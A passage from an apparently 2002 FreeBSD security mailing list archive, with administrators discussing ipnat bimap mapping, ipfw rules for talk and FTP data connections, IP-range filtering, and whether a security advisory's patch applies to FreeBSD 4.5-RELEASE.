10.10.10.0/24] open box here [10.10.20.2/32] Would bimap'ing the 24.24.24.1/32 address to 10.10.20.2/32 work? Or would that screw up my nat'ing of the 10.10.10.0/24 net? I need all ports NOT nat'ed to 10.10.10.0/24 to go to 10.10.20.2/32. Am I asking for trouble on the protected net, or is this safe? Is bimap the right thing to use? How big is the gun that I am about to use to shoot myself in the foot? Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology You have my continuous partial attention ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 9: 0:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578187pcs.martnz01.ga.comcast.net [68.47.5.16]) by hub.freebsd.org (Postfix) with ESMTP id A2A6737B40B for ; Thu, 9 May 2002 09:00:07 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g49G06i05081 for ; Thu, 9 May 2002 12:00:06 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CDA9D06.3ABEBDEE@vortex.wa4phy.net> Date: Thu, 09 May 2002 12:00:06 -0400 From: Sam Drinkard Organization: You Gotta Be Kiddin! X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-STABLE i386) X-Accept-Language: en, ja MIME-Version: 1.0 To: security@freebsd.org Subject: Talk Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm stuck again, but making progress! Trying to get talk to work again, and having some trouble determining what kind of rule to use to permit it to work once a party has logged in. I'm seeing a connection request via sockstat on tcp ports 1075-1083 or so, and udp ports in the 2500 range. My rule (that doesn't work) : allow tcp from 127.0.0.1 1025-1087 to any allow udp from 127.0.0.1 2500-2600 to any Am I all wet on my thinking here, or is something else I'm missing? Thanks.. Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 9:28:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by hub.freebsd.org (Postfix) with ESMTP id 0888237B40D for ; Thu, 9 May 2002 09:28:32 -0700 (PDT) Received: from bmah.dyndns.org ([12.233.149.189]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020509162826.VCYY25294.rwcrmhc52.attbi.com@bmah.dyndns.org>; Thu, 9 May 2002 16:28:26 +0000 Received: from intruder.bmah.org (localhost [IPv6:::1]) by bmah.dyndns.org (8.12.3/8.12.3) with ESMTP id g49GSKL8041779; Thu, 9 May 2002 09:28:20 -0700 (PDT) (envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.3/8.12.3/Submit) id g49GSGKG041778; Thu, 9 May 2002 09:28:16 -0700 (PDT) Message-Id: <200205091628.g49GSGKG041778@intruder.bmah.org> X-Mailer: exmh version 2.5+ 20020506 with nmh-1.0.4 To: "[brano]" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD-SA-02:08 In-reply-to: <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk> References: <3CD8558E.2FA68C36@lumeta.com> <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk> Comments: In-reply-to "[brano]" message dated "Wed, 08 May 2002 14:55:47 +0200." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 09 May 2002 09:28:16 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If memory serves me right, "[brano]" wrote: > I have FreeBSD 4.5-RELEASE and i compile my own kernel. I need to apply > patch FreeBSD-SA-02:08 ? > I'm look at file src/sys/conf/newvers.sh which have: > # $FreeBSD: src/sys/conf/newvers.sh,v 1.44.2.20.2.1 2002/01/28 06:42:16 > murray Exp $ > and in patch file is write 1.44.2.17.2.5 Revision > then I need apply this patch ? No need. If you look in the release notes that come with FreeBSD 4.5-RELEASE, you'll see that it already includes the fix for FreeBSD-SA-02:08. Good luck, Bruce. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 9:38:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 2DFCE37B400 for ; Thu, 9 May 2002 09:38:08 -0700 (PDT) Received: from daleco [12.145.226.171] by mail.gbronline.com (SMTPD32-7.06) id A5A23E1A0206; Thu, 09 May 2002 11:36:50 -0500 Message-ID: <00c101c1f777$ce855ce0$abe2910c@daleco> From: "Kevin Kinsey, DaleCo, S.P." To: Cc: References: <3CD8558E.2FA68C36@lumeta.com> <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk> <200205091628.g49GSGKG041778@intruder.bmah.org> Subject: Re: FreeBSD-SA-02:08 Date: Thu, 9 May 2002 11:37:26 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Bruce A. Mah" To: "[brano]" Cc: Sent: Thursday, May 09, 2002 11:28 AM Subject: Re: FreeBSD-SA-02:08 > If memory serves me right, "[brano]" wrote: > > > I have FreeBSD 4.5-RELEASE and i compile my own kernel. I need to apply > > patch FreeBSD-SA-02:08 ? > > I'm look at file src/sys/conf/newvers.sh which have: > > # $FreeBSD: src/sys/conf/newvers.sh,v 1.44.2.20.2.1 2002/01/28 06:42:16 > > murray Exp $ > > and in patch file is write 1.44.2.17.2.5 Revision > > then I need apply this patch ? > > No need. > > If you look in the release notes that come with FreeBSD 4.5-RELEASE, > you'll see that it already includes the fix for FreeBSD-SA-02:08. > > Good luck, > > Bruce. > However, there have been about 6 core issues since 4.5 Release. Look at SA-02:13, SA-02:18, SA-02:20-23.... A number of folks have mentioned possible successful attacks via the stdio exploit. Kevin Kinsey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 10: 1: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 5584B37B414 for ; Thu, 9 May 2002 10:00:45 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: References: <3CDA988D.34E2148C@centtech.com> Subject: Re: ipnat and bimapping MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020509170045.5584B37B414@hub.freebsd.org> Date: Thu, 9 May 2002 10:00:45 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Works for me. The two ranges also don't overlap. In my experience, however, even if they do ipnat is smart enough to handle certain overlapping subnets properly. I think last rule wins. ----- Original Message ----- > Would bimap'ing the 24.24.24.1/32 address to 10.10.20.2/32 work? Or would that > screw up my nat'ing of the 10.10.10.0/24 net? I need all ports NOT nat'ed to > 10.10.10.0/24 to go to 10.10.20.2/32. Am I asking for trouble on the protected > net, or is this safe? Is bimap the right thing to use? > > How big is the gun that I am about to use to shoot myself in the foot? > > Eric To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 10:48:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from blacklamb.mykitchentable.net (ekgr-dsl2-92.citlink.net [207.173.226.92]) by hub.freebsd.org (Postfix) with ESMTP id 397D437B40C for ; Thu, 9 May 2002 10:48:25 -0700 (PDT) Received: from tagalong (unknown [165.107.42.110]) by blacklamb.mykitchentable.net (Postfix) with SMTP id 3D4F5EE644 for ; Thu, 9 May 2002 10:48:24 -0700 (PDT) Message-ID: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> From: "Drew Tomlinson" To: Subject: Allowing FTP Through *My* IPFW Firewall Date: Thu, 9 May 2002 10:48:23 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm trying to figure out what rule I need to add or change to allow ftp sessions to pass through my ipfw firewall. I have search the archives but the only conclusions I have found is that this is a difficult task because of the nature of ftp. I'm hoping someone can help me with my specific situation. Here is how my home network is configured: ISP | | Public DHCP address | 3Com ADSL Modem/Router (Router performs NAT and passes packets to 10.2 by default) | (192.168.10.1) | | | (ed1 192.168.10.2) FBSD Gateway | (ed0 192.168.1.2) | | Internal LAN These are my current firewall rules: blacksheep# ipfw list 00100 allow ip from any to any via lo0 00200 deny log ip from any to 127.0.0.0/8 00300 deny log ip from 192.168.1.0/24 to any in recv ed1 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0 00500 check-state 00600 allow tcp from 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001 to any established 00700 allow tcp from any to 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established 00900 allow tcp from any to 192.168.10.2 21,22,8021 01000 allow icmp from any to any icmptype 3,4,11,12 01100 allow icmp from any to any out icmptype 8 01200 allow icmp from any to any in icmptype 0 01300 reset log tcp from any to any 113 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123 01900 allow udp from 192.168.10.1 to any 02000 allow udp from any to 192.168.10.1 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0 65500 deny log ip from any to any An FTP client on the outside can establish as session and login through the firewall but fails when the first data transfer (listing the remote directory) begins. Here is a sample entry from my security log: May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP 207.173.226.108:2191 192.168.1.4:49172 in via ed1 Any help would be appreciated. Thanks, Drew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 12:58:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id ACCA137B400 for ; Thu, 9 May 2002 12:58:21 -0700 (PDT) Received: (qmail 25164 invoked from network); 9 May 2002 19:58:10 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 9 May 2002 19:58:10 -0000 Content-Type: text/plain; charset="iso-8859-1" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: "Drew Tomlinson" Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Thu, 9 May 2002 13:53:55 -0600 X-Mailer: KMail [version 1.4] References: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> In-Reply-To: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205091353.55767.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On May 9, 2002 11:48 am, Drew Tomlinson wrote: Well this isn't really security related... Anyway... Make sure your 1st r= outer=20 (I might be unclear here.. You say that you have a NAT right after the 3c= om=20 box) can port forward ports 21,49152-65535 to your FreeBSD box. Then add the following ipfw rules to your /etc/rc.firewall file just belo= w the=20 "allow tcp from any to any established" and "allow ip from any to any fra= g"=20 lines: ${fwcmd} add allow tcp from any to ${ip} 21 setup ${fwcmd} add allow tcp from any to ${ip} 49152-65535 Then start up ftpd... "/usr/libexec/ftpd -D -a 192.168.10.2" That should do it.. it works for me..=20 I hope this helps. :) > I'm trying to figure out what rule I need to add or change to allow ftp > sessions to pass through my ipfw firewall. I have search the archives > but the only conclusions I have found is that this is a difficult task > because of the nature of ftp. I'm hoping someone can help me with my > specific situation. > > Here is how my home network is configured: > > ISP > > | Public DHCP address > > 3Com ADSL Modem/Router > (Router performs NAT and passes packets to 10.2 by default) > > | (192.168.10.1) > | > | > | (ed1 192.168.10.2) > > FBSD Gateway > > | (ed0 192.168.1.2) > > Internal LAN > > > These are my current firewall rules: > > blacksheep# ipfw list > 00100 allow ip from any to any via lo0 > 00200 deny log ip from any to 127.0.0.0/8 > 00300 deny log ip from 192.168.1.0/24 to any in recv ed1 > 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0 > 00500 check-state > 00600 allow tcp from 192.168.1.0/24 > 21,22,25,80,143,389,443,993,5405,10001 to any established > 00700 allow tcp from any to 192.168.1.0/24 > 21,22,25,80,143,389,443,993,5405,10001 > 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established > 00900 allow tcp from any to 192.168.10.2 21,22,8021 > 01000 allow icmp from any to any icmptype 3,4,11,12 > 01100 allow icmp from any to any out icmptype 8 > 01200 allow icmp from any to any in icmptype 0 > 01300 reset log tcp from any to any 113 > 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123 > 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123 > 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123 > 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123 > 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123 > 01900 allow udp from 192.168.10.1 to any > 02000 allow udp from any to 192.168.10.1 > 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1 > 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0 > 65500 deny log ip from any to any > > An FTP client on the outside can establish as session and login through > the firewall but fails when the first data transfer (listing the remote > directory) begins. Here is a sample entry from my security log: > > May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP > 207.173.226.108:2191 192.168.1.4:49172 in via ed1 > > Any help would be appreciated. > > Thanks, > > Drew > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 13:15:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (dav64.law15.hotmail.com [64.4.22.199]) by hub.freebsd.org (Postfix) with ESMTP id 04B8237B40B; Thu, 9 May 2002 13:15:14 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 9 May 2002 13:15:10 -0700 X-Originating-IP: [62.0.106.98] From: "Naughty Taz" To: Cc: Subject: IPFW and IP/mask mathematics Date: Thu, 9 May 2002 23:14:13 +0200 Message-ID: <001e01c1f79e$78612390$626a003e@homepc> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 09 May 2002 20:15:10.0262 (UTC) FILETIME=[382B9560:01C1F796] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I've been trying to get a ruleset for IPFW but was unable to figure out how to do it :( I'd appreciate it if someone can reply with the right ruleset for the following: 1) allow traffic from 0.0.0.0 - XXX.128.0.0 2) block traffic from XXX.128.0.0 - XXX.146.159.255 3) allow traffic from XXX.146.160.0 - 255.255.255.255 Thanks in advance. /Taz P.S.: IP's are imaginary of course. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 13:26:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f253.law14.hotmail.com [64.4.20.128]) by hub.freebsd.org (Postfix) with ESMTP id A97E537B407 for ; Thu, 9 May 2002 13:26:19 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 9 May 2002 13:26:19 -0700 Received: from 209.124.223.126 by lw14fd.law14.hotmail.msn.com with HTTP; Thu, 09 May 2002 20:26:18 GMT X-Originating-IP: [209.124.223.126] From: "William J. Borskey" To: amannetsec@hotmail.com, security@freebsd.org Subject: Re: ethernet firewall Date: Thu, 09 May 2002 13:26:18 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 May 2002 20:26:19.0580 (UTC) FILETIME=[C71D67C0:01C1F797] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org yea i want to allow ssh from the world to my machine (i have done this using ipfw). and i also want allow netbios from one mac address on my local net. so i should write a rule for it in both? _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 14:56:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from selenite.tzc.com (selenite.tzc.com [204.209.140.47]) by hub.freebsd.org (Postfix) with SMTP id 6AB6637B400 for ; Thu, 9 May 2002 14:56:34 -0700 (PDT) Received: (qmail 53178 invoked from network); 9 May 2002 21:56:28 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 9 May 2002 21:56:28 -0000 Content-Type: text/plain; charset="iso-8859-1" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: "Diego SOSA" Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Thu, 9 May 2002 15:52:13 -0600 X-Mailer: KMail [version 1.4] References: In-Reply-To: Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205091552.13701.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On May 9, 2002 02:09 pm, you wrote: That will not work, you need to let the ftp-data connections through... y= our=20 ruleset is for port 21 only. > Hi, i spaiking spanish > > probe: > > ipfw add 64444 allow tcp from any to any ftp > > > Sld, > D > > >>> "Dalin S. Owen" 09/05/2002 04:53:55 >>> > > On May 9, 2002 11:48 am, Drew Tomlinson wrote: > > Well this isn't really security related... Anyway... Make sure your 1st > router (I might be unclear here.. You say that you have a NAT right aft= er > the 3com box) can port forward ports 21,49152-65535 to your FreeBSD box= =2E > > Then add the following ipfw rules to your /etc/rc.firewall file just be= low > the "allow tcp from any to any established" and "allow ip from any to a= ny > frag" lines: > > ${fwcmd} add allow tcp from any to ${ip} 21 setup > ${fwcmd} add allow tcp from any to ${ip} 49152-65535 > > Then start up ftpd... > "/usr/libexec/ftpd -D -a 192.168.10.2" > > That should do it.. it works for me.. > > I hope this helps. :) > > > I'm trying to figure out what rule I need to add or change to allow f= tp > > sessions to pass through my ipfw firewall. I have search the archive= s > > but the only conclusions I have found is that this is a difficult tas= k > > because of the nature of ftp. I'm hoping someone can help me with my > > specific situation. > > > > Here is how my home network is configured: > > > > ISP > > > > | Public DHCP address > > > > 3Com ADSL Modem/Router > > (Router performs NAT and passes packets to 10.2 by default) > > > > | (192.168.10.1) > > | > > | > > | (ed1 192.168.10.2) > > > > FBSD Gateway > > > > | (ed0 192.168.1.2) > > > > Internal LAN > > > > > > These are my current firewall rules: > > > > blacksheep# ipfw list > > 00100 allow ip from any to any via lo0 > > 00200 deny log ip from any to 127.0.0.0/8 > > 00300 deny log ip from 192.168.1.0/24 to any in recv ed1 > > 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0 > > 00500 check-state > > 00600 allow tcp from 192.168.1.0/24 > > 21,22,25,80,143,389,443,993,5405,10001 to any established > > 00700 allow tcp from any to 192.168.1.0/24 > > 21,22,25,80,143,389,443,993,5405,10001 > > 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established > > 00900 allow tcp from any to 192.168.10.2 21,22,8021 > > 01000 allow icmp from any to any icmptype 3,4,11,12 > > 01100 allow icmp from any to any out icmptype 8 > > 01200 allow icmp from any to any in icmptype 0 > > 01300 reset log tcp from any to any 113 > > 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123 > > 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123 > > 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123 > > 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123 > > 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123 > > 01900 allow udp from 192.168.10.1 to any > > 02000 allow udp from any to 192.168.10.1 > > 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1 > > 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0 > > 65500 deny log ip from any to any > > > > An FTP client on the outside can establish as session and login throu= gh > > the firewall but fails when the first data transfer (listing the remo= te > > directory) begins. Here is a sample entry from my security log: > > > > May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP > > 207.173.226.108:2191 192.168.1.4:49172 in via ed1 > > > > Any help would be appreciated. > > > > Thanks, > > > > Drew > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 15: 1:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 7909A37B409 for ; Thu, 9 May 2002 15:01:29 -0700 (PDT) Received: (qmail 27156 invoked from network); 9 May 2002 22:01:28 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 9 May 2002 22:01:28 -0000 Content-Type: text/plain; charset="iso-8859-1" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: "Naughty Taz" Subject: Re: IPFW and IP/mask mathematics Date: Thu, 9 May 2002 15:57:13 -0600 X-Mailer: KMail [version 1.4] References: <001e01c1f79e$78612390$626a003e@homepc> In-Reply-To: <001e01c1f79e$78612390$626a003e@homepc> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205091557.13783.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What kind of "traffic", I wil assume you want to block "all"=20 (tcp/udp/icmp/esp/ah/look in /etc/protocols for a list).... /sbin/ipfw add allow all from 0.0.0.0 to XXX.128.0.0 /sbin/ipfw add deny all from XXX.128.0.0 to XXX.146.159.255 /sbin/ipfw add allow all from XXX.146.160.0 to 255.255.255.255 There ya go.. :) On May 9, 2002 03:14 pm, Naughty Taz wrote: > Hi all, > > I've been trying to get a ruleset for IPFW but was unable to figure out > how to do it :( > I'd appreciate it if someone can reply with the right ruleset for the > following: > > 1) allow traffic from 0.0.0.0 - XXX.128.0.0 > 2) block traffic from XXX.128.0.0 - XXX.146.159.255 > 3) allow traffic from XXX.146.160.0 - 255.255.255.255 > > Thanks in advance. > > /Taz > > P.S.: IP's are imaginary of course. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 15:13:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (dav30.law15.hotmail.com [64.4.22.87]) by hub.freebsd.org (Postfix) with ESMTP id 70FA037B49F for ; Thu, 9 May 2002 15:12:49 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 9 May 2002 15:12:49 -0700 X-Originating-IP: [62.0.106.98] From: "Naughty Taz" To: Cc: Subject: RE: IPFW and IP/mask mathematics Date: Fri, 10 May 2002 01:11:51 +0200 Message-ID: <004d01c1f7ae$e752ad90$626a003e@homepc> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <200205091557.13783.dowen@pstis.com> X-OriginalArrivalTime: 09 May 2002 22:12:49.0297 (UTC) FILETIME=[A7AED810:01C1F7A6] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hehehehe :) That was not my intention of course. Observe: 1) allow traffic from ANY to IP's in the range (0.0.0.0 - XXX.128.0.0) 2) block traffic from ANY to IP's in the range (XXX.128.0.0 - XXX.146.159.255) 3) allow traffic from ANY to IP's in the range (XXX.146.160.0 - 255.255.255.255) Is it more clear now? /Taz -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Dalin S. Owen Sent: ? 09 ??? 2002 23:57 To: Naughty Taz Cc: security@freebsd.org Subject: Re: IPFW and IP/mask mathematics What kind of "traffic", I wil assume you want to block "all" (tcp/udp/icmp/esp/ah/look in /etc/protocols for a list).... /sbin/ipfw add allow all from 0.0.0.0 to XXX.128.0.0 /sbin/ipfw add deny all from XXX.128.0.0 to XXX.146.159.255 /sbin/ipfw add allow all from XXX.146.160.0 to 255.255.255.255 There ya go.. :) On May 9, 2002 03:14 pm, Naughty Taz wrote: > Hi all, > > I've been trying to get a ruleset for IPFW but was unable to figure out > how to do it :( > I'd appreciate it if someone can reply with the right ruleset for the > following: > > 1) allow traffic from 0.0.0.0 - XXX.128.0.0 > 2) block traffic from XXX.128.0.0 - XXX.146.159.255 > 3) allow traffic from XXX.146.160.0 - 255.255.255.255 > > Thanks in advance. > > /Taz > > P.S.: IP's are imaginary of course. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 15:44: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from leaf.lumiere.net (leaf.lumiere.net [208.44.192.100]) by hub.freebsd.org (Postfix) with ESMTP id 2E45737B413 for ; Thu, 9 May 2002 15:43:46 -0700 (PDT) Received: by leaf.lumiere.net (Postfix, from userid 1082) id 067C0CD36; Thu, 9 May 2002 15:43:41 -0700 (PDT) Date: Thu, 9 May 2002 15:43:40 -0700 From: Derrick John Klise To: Naughty Taz Cc: security@freebsd.org Subject: Re: IPFW and IP/mask mathematics Message-ID: <20020509154340.A8964@leaf.lumiere.net> References: <200205091557.13783.dowen@pstis.com> <004d01c1f7ae$e752ad90$626a003e@homepc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <004d01c1f7ae$e752ad90$626a003e@homepc>; from naughty_taz@hotmail.com on Fri, May 10, 2002 at 01:11:51AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, May 10, 2002 at 01:11:51AM +0200, Naughty Taz 